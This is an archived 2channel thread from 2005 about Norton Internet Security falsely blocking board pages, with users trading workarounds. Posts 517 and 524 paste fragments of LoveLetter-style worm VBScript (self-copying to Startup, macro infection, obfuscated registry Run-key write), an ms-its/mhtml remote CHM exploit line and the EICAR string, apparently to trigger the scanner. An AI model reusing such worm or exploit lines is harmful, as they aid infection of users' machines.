0001動け動けウゴウゴ2ちゃんねる
2005/11/28(月) 16:08:40ID:bR9gbCGm0アドレスをクリックすると攻撃者を追跡できます
この攻撃について詳しくは シマンテック・セキュリティ・レスポンス
探検
ノートン誤作動対策本部
■ このスレッドは過去ログ倉庫に格納されています
アドレスをクリックすると攻撃者を追跡できます
この攻撃について詳しくは シマンテック・セキュリティ・レスポンス
0477動け動けウゴウゴ2ちゃんねる
2005/12/01(木) 20:46:08ID:aHMzi8rD0これによるとアクティブスクリプトを無効にすれば
HTTP MSIE JavaScript Onload Rte CodeExecの検知は必要なくなるみたいだね。
2chを信頼したくない人はこっちでやった方が良いかもよ。
0478動け動けウゴウゴ2ちゃんねる
2005/12/01(木) 21:07:38ID:NgGuaDqu0_ (m) _ピコーン
|ミ|
/ .`´ \
('A`) そうだ諦めよう!
ノヽノヽ
くく
0479動け動けウゴウゴ2ちゃんねる
2005/12/01(木) 21:09:49ID:VVCYcTZd0ありがとう!
見てみます
0480動け動けウゴウゴ2ちゃんねる
2005/12/01(木) 21:12:43ID:X/Ly/Tqg0もう一個の設定出来たらスムーズに出来ちゃいました!
親切にありがとね。
0481動け動けウゴウゴ2ちゃんねる
2005/12/01(木) 21:58:56ID:kJ795N2R00482動け動けウゴウゴ2ちゃんねる
2005/12/01(木) 22:03:15ID:dNq4OE/f0気のせい?
0483動け動けウゴウゴ2ちゃんねる
2005/12/01(木) 22:33:57ID:fa798wEV0【Norton Internet Security】
↓
【侵入防止】
↓
【AutoBlock】 ←
手動で【遮断しているコンピュータ】を【すべてを遮断解除】→↑
の繰り返しが安全じゃないですか?
0484動け動けウゴウゴ2ちゃんねる
2005/12/01(木) 22:42:48ID:7z8TtYrS0↓
侵入検出
↓
遮断解除
↓
取得をやりなおす
↓
侵入検出
↓
以下ループ
穴あけないと使えない
0485動け動けウゴウゴ2ちゃんねる
2005/12/01(木) 22:49:36ID:UY8lxahn0さっきは実況chTXでも検出したぞ
0486動け動けウゴウゴ2ちゃんねる
2005/12/01(木) 23:27:00ID:f0UsKPRw0それはノートン先生からログ除外すればいいんじゃ・・・(´・ω・`)
0487動け動けウゴウゴ2ちゃんねる
2005/12/01(木) 23:36:42ID:BF/Q6J/m0「危険が嫌ならFW乗り換えろ」って意見は多数出る。
しかし金出して買った権利どうすんだ?
ユーザーに誤作動の責任なんか無いぞ。
乗り換えるにしても誤作動が原因なら当然返金だよな?
正規ユーザーがおらんのか? 工作員が邪魔してるのか?
0488動け動けウゴウゴ2ちゃんねる
2005/12/01(木) 23:41:35ID:WIUt1ZNZ0442 名前:動け動けウゴウゴ2ちゃんねる 投稿日:2005/11/29(火) 15:01:54 ID:eTCs9aYs0(1)
>運営の人
ノートン誤作動の件なんだけど明らかに狙って書き込みしてるんだから
特定文字列を書き込みしようとした人を強制バーボンとかしてもいいんじゃないの?
448 名前: ◆SSu.zv/rvs 投稿日:2005/11/29(火) 15:14:32 ID:zBqE3jpw0
淘汰されなきゃね、
生き残りを手伝う気はさらさらないっす
449 名前: ◆MUMUMUhnYI 投稿日:2005/11/29(火) 15:18:01 ID:VEIDKG1+0
そんな迷惑なソフトなんて、自然にまかせてなくなるべきだって、
おじさんはゆうだろうな。
私も、そう思っていたり。
0489動け動けウゴウゴ2ちゃんねる
2005/12/01(木) 23:41:47ID:VpH6UZP800490動け動けウゴウゴ2ちゃんねる
2005/12/01(木) 23:47:29ID:rKQDZ2GC00491動け動けウゴウゴ2ちゃんねる
2005/12/01(木) 23:49:34ID:BF/Q6J/m0誤作動するのは2chだけか?
>>489
代わりは? マックか? リナか? トロンか?
OS換えるよりFW交換の方が安くて早い。
選択肢もOSより多い。
なにより
「ゲイツさん、ノートンが誤作動します。OS代金返して」
「ノートンに言え。他のソフトじゃ誤作動しない。」
で終了。
0492動け動けウゴウゴ2ちゃんねる
2005/12/01(木) 23:58:45ID:UY8lxahn0えーと、言葉足らずだったかな
めんどくせーのは、検出されるたびにそのIPを信頼リストに入れるのが、ってこと
(ま、2chすべて信頼済みにすればいいんだろけど)
実動作しない単に貼られた文字列に反応するノートン先生もトンチキだけど、
そもそもそういうのを貼るのが困ったもんだわ('A`)
0493動け動けウゴウゴ2ちゃんねる
2005/12/02(金) 00:06:32ID:f/DdBIuN00494動け動けウゴウゴ2ちゃんねる
2005/12/02(金) 00:44:36ID:qGXnD/Au0ノートン側が対応したのかな。
0495動け動けウゴウゴ2ちゃんねる
2005/12/02(金) 01:01:34ID:E1VjDr3W00496動け動けウゴウゴ2ちゃんねる
2005/12/02(金) 02:32:13ID:GJg9CYrP00497動け動けウゴウゴ2ちゃんねる
2005/12/02(金) 09:34:49ID:iz9f1dAv00498動け動けウゴウゴ2ちゃんねる
2005/12/02(金) 11:12:45ID:cheTjBMl0>178
新手のノートントラップです。
ここじゃ、明かせないのでメールにて説明しますね。
186 ◆MUMUMUhnYI sage 2005/11/28(月) 11:51:32 ID:/3xX5FyA0
>>181
メール届きました。
ううむ。なんだかなぁ。
188 ◆MUMUMUhnYI sage 2005/11/28(月) 11:52:48 ID:/3xX5FyA0
とりあえず、問題の本質は理解したです。
ノートントラップというか、問題はもっと根が深いかんじですね。
公開情報ではありますが、確かに現段階では、ここに書くのははばかられるです。
194 ◆MUMUMUhnYI sage 2005/11/28(月) 11:56:51 ID:/3xX5FyA0
ひとことだけ。
「ノートンから除外した場合(というか一般的に当然ですが)には、
不審なリンクは不用意にクリックしない」
とゆうことで。
・・・なんか裏で極秘プロジェクトでも進んでるの?
0499動け動けウゴウゴ2ちゃんねる
2005/12/02(金) 11:32:13ID:CS5/4izN0公開の場に詳しく書くと、見る人が見た時悪用できるって事だと思う。
最後のは「ノートンの防御機能を無効にしたらユーザーが気をつける」
むむむさんが書いてる通り当然のこと。
ってかノートン入れてても怪しいリンクを安易に踏まないのは基本。
0500大空寺あゆ親衛隊 HELVA ◆THYOQYTAXA
2005/12/02(金) 11:46:51ID:ha+3nG/100501動け動けウゴウゴ2ちゃんねる
2005/12/02(金) 13:07:35ID:cnBkrw7B00502動け動けウゴウゴ2ちゃんねる
2005/12/02(金) 13:32:17ID:cheTjBMl0なるほど、納得
0503動け動けウゴウゴ2ちゃんねる
2005/12/02(金) 13:34:57ID:NVBOvwGY0更に細かく除外するコンピュータの設定がついてれば今より少しは安心出来るのに
まあそこまで細かくしすぎると管理し辛いか
0504動け動けウゴウゴ2ちゃんねる
2005/12/02(金) 14:52:00ID:8ba/exXp0ニュー速のスレを開いたら何者かが侵入を試みたので防ぎましたみたいなのが
出てそれからΝ速、+、共に見れなくなりました・・・
0505動け動けウゴウゴ2ちゃんねる
2005/12/02(金) 14:54:05ID:kr+j+cUM00506動け動けウゴウゴ2ちゃんねる
2005/12/02(金) 15:22:07ID:qr3dRIBW0このスレのおかげでつ
0507動け動けウゴウゴ2ちゃんねる
2005/12/02(金) 16:28:38ID:Pk54sSfs0確かにな。「2ch鯖からのHTTP MSIE javaScript OnLoad Rte CodeExec検知」だけ
除外できれば言うことなしだったのに。
0508動け動けウゴウゴ2ちゃんねる
2005/12/02(金) 16:52:13ID:tIJ8d4TQ00509cen ◆Pm9xOTJuM.
2005/12/02(金) 18:23:29ID:kFY/QJAu0どもですよ
0510動け動けウゴウゴ2ちゃんねる
2005/12/02(金) 20:42:10ID:IHq1xYI10テスト
0511動け動けウゴウゴ2ちゃんねる
2005/12/02(金) 22:05:12ID:h5gB50Dy0氏ね。
0512動け動けウゴウゴ2ちゃんねる
2005/12/02(金) 22:07:34ID:6e6XLCLy0<body onload=window()>
0513動け動けウゴウゴ2ちゃんねる
2005/12/03(土) 00:55:30ID:r4GdU0C100514動け動けウゴウゴ2ちゃんねる
2005/12/03(土) 10:44:32ID:F4mYTX8O00515動け動けウゴウゴ2ちゃんねる
2005/12/03(土) 10:55:30ID:5PagNx8c0野トンだと>>509以降の表示がぶっ壊れるよ
なにやってんだかな、野トン先生orz
0516シラネーヨ
2005/12/03(土) 11:15:23ID:H4hlwyNK00517動け動けウゴウゴ2ちゃんねる
2005/12/03(土) 20:13:14ID:xBom7gmX0c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
End Sub
0518動け動けウゴウゴ2ちゃんねる
2005/12/03(土) 20:49:29ID:3AOyRztk0酒 (´д`) < 俺、知ってるよ…。
======== \
/※※※※ゞノ ,_)
~~~~~~~~~~~~~~~~
0519動け動けウゴウゴ2ちゃんねる
2005/12/03(土) 23:28:01ID:MCEAT7+b0磊厨どこにいるの!?
0520動け動けウゴウゴ2ちゃんねる
2005/12/04(日) 01:26:29ID:eoIfSVsw0反応した・・・。
0521動け動けウゴウゴ2ちゃんねる
2005/12/04(日) 04:28:24ID:X+Ww/b+O0氏ね
>>512
お前も氏ね
>>517
お前は氏ねじゃなくて死ね!
0522動け動けウゴウゴ2ちゃんねる
2005/12/04(日) 04:37:08ID:h85ucp1x00523動け動けウゴウゴ2ちゃんねる
2005/12/04(日) 12:26:49ID:50GK9X4n00524http://h.pic.to/30ayt
2005/12/04(日) 12:37:37ID:EpZg83SWOc.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
End Sub
0525動け動けウゴウゴ2ちゃんねる
2005/12/04(日) 12:57:25ID:S0JmhzX20どういう誤認で誤作動するわけ?具体的に頼む
0526動け動けウゴウゴ2ちゃんねる
NGNG>>22の記事を読めばなんとなくわかるかと。
0527動け動けウゴウゴ2ちゃんねる
2005/12/04(日) 20:13:57ID:S0JmhzX20d
0528動け動けウゴウゴ2ちゃんねる
2005/12/05(月) 01:34:57ID:FdnPK1jR00529動け動けウゴウゴ2ちゃんねる
2005/12/05(月) 17:48:16ID:5iffv5U70確かに反応はしなくなるが、それを逆手に利用しLogフォルダを狙ってくるかもと妄想してみる
まだじゃまくさいが*.dat毎に設定した方が…
0530動け動けウゴウゴ2ちゃんねる
2005/12/05(月) 18:11:55ID:b5q7G/4D00531動け動けウゴウゴ2ちゃんねる
2005/12/05(月) 18:29:11ID:uXQGgEEr00532動け動けウゴウゴ2ちゃんねる
2005/12/06(火) 15:43:56ID:LkdisUM70ノートン誤作動対策本部
http://qb5.2ch.net/test/read.cgi/operate/1133161720/
ここをミロ
0533動け動けウゴウゴ2ちゃんねる
2005/12/06(火) 15:45:13ID:yXevFHab00534動け動けウゴウゴ2ちゃんねる
2005/12/06(火) 15:45:56ID:FdwqPeUF0ちゃんと見なきゃだよ〜〜
0535動け動けウゴウゴ2ちゃんねる
2005/12/06(火) 15:49:22ID:S/1II8Rk0わかったか?
よし、わかったんなら席に着け。
0536動け動けウゴウゴ2ちゃんねる
2005/12/06(火) 16:59:02ID:ba9NK7rA0笑ったり泣いたり出来なくしてやる!
0537動け動けウゴウゴ2ちゃんねる
2005/12/07(水) 15:54:11ID:h/m9952k0( ´д)ヒソ(´д`)ヒソ(д` )
0538動け動けウゴウゴ2ちゃんねる
2005/12/07(水) 16:40:37ID:aPTNAClw0まるでそびえたつクソだ!
0539動け動けウゴウゴ2ちゃんねる
2005/12/07(水) 20:54:02ID:zqDlR1140まったくもー。
0540動け動けウゴウゴ2ちゃんねる
2005/12/07(水) 22:38:17ID:p1e7f/VT0侵入阻止→拡張→HTTP MSIE javaScript OnLoad Rte CodeExec
のチェックはずして、
オミトロンの
Onload Unloader
をオンにスルだけで解決するんだが。
何をそんなに騒ぐ。
0541動け動けウゴウゴ2ちゃんねる
2005/12/07(水) 23:44:58ID:KWMarFNX00542動け動けウゴウゴ2ちゃんねる
2005/12/08(木) 01:43:07ID:J0d2TFmr0何ら問題は無い。
問題はIEの味噌も糞も一緒くたにとっとくテンポラリフォルダだ。
これもブラウザ閉じた時にキャッシュを削除する設定にしておけば
多少は安心だろう。
0543動け動けウゴウゴ2ちゃんねる
2005/12/08(木) 20:46:26ID:vweIWjoM0やれやれ・・・
0544動け動けウゴウゴ2ちゃんねる
2005/12/10(土) 21:42:55ID:L+GgO2q30まとめサイトの対策してるのに
0545動け動けウゴウゴ2ちゃんねる
2005/12/11(日) 09:53:51ID:UxoL4GzC00546動け動けウゴウゴ2ちゃんねる
2005/12/11(日) 10:27:46ID:NT8ogfEm00547動け動けウゴウゴ2ちゃんねる
2005/12/11(日) 19:58:01ID:u72QiQwD00548動け動けウゴウゴ2ちゃんねる
2005/12/12(月) 07:35:05ID:Oxp01vs20なわけねーだろボケ
0549動け動けウゴウゴ2ちゃんねる
2005/12/12(月) 23:00:52ID:6AEQSNlY0誤作動うぜぇー
0550動け動けウゴウゴ2ちゃんねる
2005/12/13(火) 00:03:08ID:EccYzO0u00551動け動けウゴウゴ2ちゃんねる
2005/12/13(火) 00:14:46ID:mrrPdy+U00552動け動けウゴウゴ2ちゃんねる
2005/12/13(火) 00:15:43ID:VF/WnYDZ0片方が対策しただけのような気がする。
0553動け動けウゴウゴ2ちゃんねる
2005/12/13(火) 00:16:24ID:jbIWO4hy00554動け動けウゴウゴ2ちゃんねる
2005/12/13(火) 00:37:32ID:mrrPdy+U0それなりに情報も行き渡ったって事ね、了解。
0555動け動けウゴウゴ2ちゃんねる
2005/12/13(火) 01:15:55ID:ct+jZ+de0どうやらこの前のupdateで、Symantecが対応したようだ。
まあ、定義ファイルちょこっといじるだけだしね。
0556動け動けウゴウゴ2ちゃんねる
2005/12/13(火) 01:24:49ID:+TojAte/00557動け動けウゴウゴ2ちゃんねる
2005/12/13(火) 01:27:38ID:P59zanKB00558動け動けウゴウゴ2ちゃんねる
2005/12/13(火) 01:49:57ID:4oy/C4vr00559動け動けウゴウゴ2ちゃんねる
2005/12/13(火) 07:12:17ID:yYTaEYqU0何故か専用ブラウザ(JaneDoeView)だと問題なくなったけど
IEで見ると以前と同じように侵入防止される
0560動け動けウゴウゴ2ちゃんねる
2005/12/13(火) 10:52:51ID:LUKc0KsC0なわけねーだろボケ
0561動け動けウゴウゴ2ちゃんねる
2005/12/13(火) 13:26:01ID:Mc0lYOUq0ログを一旦消して、誤爆文字列を再読み込みさせると遮断されるよw
0562動け動けウゴウゴ2ちゃんねる
2005/12/13(火) 16:33:49ID:Fiu/blpC02005+かちゅだけど、ログ消して再取得してもまったく問題ないよ。
確かこのスレにもコード張ってあったよね。
該当スレ削除されてるのかな?
数日前から信頼ゾーン元に戻してあちこち見てるけど、一度も遮断は起きてない。
0563動け動けウゴウゴ2ちゃんねる
2005/12/13(火) 16:46:09ID:e28xE5tY0ログ削除してJane再起動してこのスレ取得してみたけど問題なし
0564動け動けウゴウゴ2ちゃんねる
2005/12/13(火) 16:47:53ID:e28xE5tY00565動け動けウゴウゴ2ちゃんねる
2005/12/13(火) 17:19:46ID:LUKc0KsC00566動け動けウゴウゴ2ちゃんねる
2005/12/13(火) 17:50:38ID:EccYzO0u00567動け動けウゴウゴ2ちゃんねる
2005/12/13(火) 18:56:54ID:i8UVIJLB00568動け動けウゴウゴ2ちゃんねる
NGNG0569動け動けウゴウゴ2ちゃんねる
2005/12/13(火) 20:41:24ID:yYTaEYqU0ちゃんと消してからやってるけど?
とりあえず自分で検証してから煽りいれないとただの恥ずかしい人だぞ
0570動け動けウゴウゴ2ちゃんねる
2005/12/13(火) 21:21:25ID:qGOg/NGt0JaneDoeStyleでこのスレ開いてみたけど大丈夫でした。
(もちろん、ログ再所得済)
ただし>>559同様、IEはダメ。
一度IEで開くと、その後はJaneでもダメ。
0571動け動けウゴウゴ2ちゃんねる
2005/12/13(火) 21:31:58ID:VBj/AhMS00572動け動けウゴウゴ2ちゃんねる
2005/12/13(火) 21:39:18ID:mvJZvZGa0専用ブラウザでの閲覧は現在問題無しみたいだ。
もちろんログ消去をやった上で。
少なくても日曜日の段階では、自分も専用ブラウザの閲覧でトラップに引っ掛かっていた。
317 名前:名無しさん@お腹いっぱい。 [sage] 投稿日:2005/12/11(日) 14:25:00
2005は直ってないの?直ってたら乗り換えようと思ってるんだけど
318 名前:名無しさん@お腹いっぱい。 [] 投稿日:2005/12/11(日) 14:50:13
2006が直った言うのはマジですか?
319 名前:名無しさん@お腹いっぱい。 [sage] 投稿日:2005/12/11(日) 14:58:53
2006直ってないよ。
シグネチャ更新しても、問題のヤツはそのまま残ってて、いきなり遮断されたしw
プログラム本体の更新が無い限り直らんでしょ?これ。
ホントに直った人いるの?
320 名前:名無しさん@お腹いっぱい。 [sage] 投稿日:2005/12/11(日) 15:00:33
また工作員の虚言か!
321 名前:297 [sage] 投稿日:2005/12/11(日) 15:00:54
ありがとう。
やってみるよ。
322 名前:名無しさん@お腹いっぱい。 [sage] 投稿日:2005/12/11(日) 15:27:18
あれ・・・DL板で更新したら問題なく更新されたんで直ったと思ったが何回かやってると遮断してるな・・@2004
なんじゃこりゃ
で、IEによる閲覧では現在も遮断される事から、最新のアップデートでもノートントラップが対応出来ていないのは明らか。
どーなってんの???
0573動け動けウゴウゴ2ちゃんねる
2005/12/14(水) 12:27:12ID:WvVfrDFo0シマ対応した模様。
この問題については、解決したのでは。
0574動け動けウゴウゴ2ちゃんねる
2005/12/14(水) 12:54:03ID:4UluMZjh0全然対応してないから。
0575動け動けウゴウゴ2ちゃんねる
2005/12/14(水) 13:00:51ID:WvVfrDFo00576動け動けウゴウゴ2ちゃんねる
2005/12/14(水) 13:30:12ID:gN/cypwS0■ このスレッドは過去ログ倉庫に格納されています
ニュース
- 【速報】衆院3補選 いずれも立民候補が当選確実 自民議席失う ★9 [Hitzeschleier★]
- 【速報】衆院3補選 いずれも立民候補が当選確実 自民議席失う ★10 [Hitzeschleier★]
- 維新・馬場代表「まだまだ関西以外の小選挙区で勝つことは厳しい」 ★2 [蚤の市★]
- 【パリ五輪】サッカー U23 日本代表 今夜イラク戦 勝てば五輪確定 [阿弥陀ヶ峰★]
- ドイツ24年成長率、日本下回りG7最低 産業空洞化の影 [蚤の市★]
- 小池都知事、姿見せず 衆院補選 [どどん★]
- やす子、自身の容姿への失礼な投稿に激怒 「いつでも戦車で引ける」 [279254606]
- 自民幹部「乙武さんがここまで人気がないのは想定外だった」 [786835273]
- 新築ジャップの戸建て、ちょっと揺れただけで一瞬で崩壊wwwwwwwwwwwwwww [542840565]
- 野ざらしで陳列してある総菜パンあるな🍞 [509981292]
- (ヽ´ん`)「世の中で起きる問題で正解を示すのはいつも日本共産党。いずれ立憲民主党の不正も暴かれる。嫌儲の共産支持はガチ」 [932029429]
- 立憲民主党の泉健太代表、評価が爆上がりする [932029429]